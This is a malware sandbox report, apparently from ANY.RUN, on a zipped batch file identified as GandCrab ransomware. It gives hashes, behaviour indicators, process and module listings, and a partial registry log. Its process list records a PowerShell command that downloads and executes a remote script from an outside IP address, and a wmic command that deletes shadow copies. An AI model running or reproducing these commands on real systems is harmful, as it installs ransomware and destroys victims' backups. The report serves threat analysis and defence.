General Info

File name

test_ran.bat.zip.zip

Full analysis
https://app.any.run/tasks/7a730f6a-9af5-42b8-9506-7ae26e185d38
Verdict
Malicious activity
Analysis date
11/8/2018, 10:29:59
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

ransomware

gandcrab

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

0f2f9de6010d559b34c3143b2d6f385e

SHA1

595c99433b564f1a57553cf5ed5e5a9b9fd573c5

SHA256

da0c26e8b5431ecc98b7541919cfbb67f2f50a002d9f195375c44bfdfbc35799

SSDEEP

12:5TkfQCyj41IawO9w5b/rkkKftzXCHY2OXkWkTiTEa0n:tkyjU0O9w5GNSBAm5n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Writes file to Word startup folder
  • powershell.exe (PID: 256)
Deletes shadow copies
  • powershell.exe (PID: 256)
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 256)
GandCrab keys found
  • powershell.exe (PID: 256)
Executes PowerShell scripts
  • cmd.exe (PID: 2372)
Actions look like stealing of personal data
  • powershell.exe (PID: 256)
Renames files like Ransomware
  • powershell.exe (PID: 256)
Connects to CnC server
  • powershell.exe (PID: 256)
Creates files like Ransomware instruction
  • powershell.exe (PID: 256)
Starts CMD.EXE for commands execution
  • WinRAR.exe (PID: 1216)
Application launched itself
  • WinRAR.exe (PID: 3708)
Reads Internet Cache Settings
  • powershell.exe (PID: 256)
Creates files in the user directory
  • powershell.exe (PID: 256)
Reads settings of System Certificates
  • powershell.exe (PID: 256)
Application launched itself
  • chrome.exe (PID: 2792)
Dropped object may contain Tor URLs
  • powershell.exe (PID: 256)


Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
788
ZipBitFlag:
0x0001
ZipCompression:
Deflated
ZipModifyDate:
2018:11:08 10:29:25
ZipCRC:
0x45b18bc3
ZipCompressedSize:
291
ZipUncompressedSize:
293
ZipFileName:
test_ran.bat.zip

Processes

Total processes
50
Monitored processes
16
Malicious processes
4
Suspicious processes
0

Behavior graph

Processes shown in the graph: winrar.exe, winrar.exe, cmd.exe, powershell.exe (flagged #GANDCRAB), wmic.exe, notepad.exe, chrome.exe and nine child chrome.exe processes; all except powershell.exe and the first chrome.exe are marked "no specs".

Process information


PID
3708
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0

PID
1216
CMD
"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Rar$DIb3708.43025\test_ran.bat.zip
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0

PID
2372
CMD
cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIb1216.44211\test_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID
256
CMD
powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)

PID
2828
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)

PID
3968
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\QZWWJFJNT-DECRYPT.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)

PID
2792
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106

PID
1864
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x701100b0,0x701100c0,0x701100cc
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106

PID
3568
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=568 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106

PID
1412
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D6F98CAFFE73E5AAD170818777692A5C --mojo-platform-channel-handle=880 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106

PID
2088
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --service-pipe-token=9DD58F93F523210E18A95845D75F515D --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9DD58F93F523210E18A95845D75F515D --renderer-client-id=5 --mojo-platform-channel-handle=1912 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2192
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --service-pipe-token=E3BE1B6E1EC134F95142BD2845174A04 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=E3BE1B6E1EC134F95142BD2845174A04 --renderer-client-id=3 --mojo-platform-channel-handle=2040 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3664
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=57F6BA6F99B21EECA9487CCF7DF10816 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=57F6BA6F99B21EECA9487CCF7DF10816 --renderer-client-id=6 --mojo-platform-channel-handle=3524 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2968
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=7804EBFD8C36FE943546CA196C8BD9B4 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=7804EBFD8C36FE943546CA196C8BD9B4 --renderer-client-id=7 --mojo-platform-channel-handle=3780 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3328
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=0A6E2CEEA3A6A47F3B45D026F484B9C6 --mojo-platform-channel-handle=3556 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

PID
2020
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=916,9997920705476722991,9226302308421404447,131072 --enable-features=PasswordImport --lang=en-US --no-sandbox --service-request-channel-token=3FF1DFAC1AA071C1677C47495E33B9DD --mojo-platform-channel-handle=3584 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\twext.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\zipfldr.dll
c:\program files\winrar\rarext.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\syncui.dll
c:\windows\system32\synceng.dll
c:\program files\notepad++\nppshell_06.dll
c:\windows\system32\acppage.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\msi.dll
c:\windows\system32\wer.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
1775
Read events
1590
Write events
184
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3708
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\test_ran.bat.zip.zip
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface
ShowPassword
0
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
3708
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
3708
WinRAR.exe
write
